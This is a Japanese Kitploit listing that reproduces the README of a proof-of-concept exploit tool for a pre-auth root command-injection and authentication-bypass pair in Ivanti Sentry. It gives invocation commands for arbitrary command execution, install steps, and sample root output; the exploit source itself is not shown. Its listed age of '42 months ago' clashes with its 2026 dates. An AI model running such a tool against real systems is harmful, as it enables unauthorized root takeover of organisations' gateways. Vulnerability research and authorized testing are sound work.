Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
ツール/GitHubGitHub/0xblackash/cve-2026-10520
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

リポジトリを見る
42ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🎯 CVE-2026-10520 および CVE-2026-10523 - Ivanti Sentry

ChatGPT Image Jun 11, 2026, 11_19_12 AM

Ivanti Sentry Critical RCE

プリ認証リモートコード実行 + 認証バイパス

作成者: Ashraf Zaryouh "0xBlackash"

GitHub


📌 概要

Ivanti Sentry(旧MobileIron Sentry)に影響する2つの重大な脆弱性:

  • CVE-2026-10520 → CVSS 10.0 - プリ認証OSコマンドインジェクション(root権限でのRCE)
  • CVE-2026-10523 → CVSS 9.9 - 認証バイパス

これらの欠陥により、認証されていない攻撃者がシステム全体を完全に制御できる可能性があります。


✨ 特長

  • ✅ クリーンで高速なPoC
  • ✅ プリ認証(認証情報不要)
  • ✅ rootレベルでのコマンド実行
  • ✅ 詳細な出力フォーマット
  • ✅ プロキシサポート
  • ✅ 冗長モード
  • ✅ 美しいターミナルUI

🚀 使用方法

root@kitploit:~
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>

例

root@kitploit:~
# 基本的な使い方
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"

# 冗長モード
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v

# プロキシ使用時
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080

# カーネル確認
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"

📋 オプション


🛠️ インストール

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py

📷 エクスプロイト成功例

脆弱な場合、以下のように表示されます:

root@kitploit:~

 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  
          CVE-2026-10520 & CVE-2026-10523 PoC Exploit
          Ivanti Sentry Pre-Auth RCE + Auth Bypass
          
          Author: Ashraf Zaryouh "0xBlackash"
          GitHub: https://github.com/0xBlackash


[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)

⚠️ 免責事項

このツールは教育目的および許可されたセキュリティテスト専用です。
あなたが所有していないシステムに対する不正使用は違法です。
作成者は誤用に対する一切の責任を負いません。


🔧 影響を受けるバージョン

  • Ivanti Sentry 10.5.2、10.6.2、10.7.1より前のバージョン

修正バージョン: 10.5.2 / 10.6.2 / 10.7.1


📜 参照

  • Ivanti公式アドバイザリ
  • watchTowr Labsのオリジナル研究
  • NVDエントリ:CVE-2026-10520、CVE-2026-10523

Ashraf Zaryouh "0xBlackash" によって ❤️ を込めて作成されました

便利だと思ったらレポジトリにスターをお願いします! ⭐

ツールをダウンロード
引数説明必須
--urlターゲットURL(例:https://target:8443)はい
--cmd実行するコマンドはい
-v, --verbose冗長出力を有効化いいえ
--proxyHTTPプロキシ(host:port)いいえ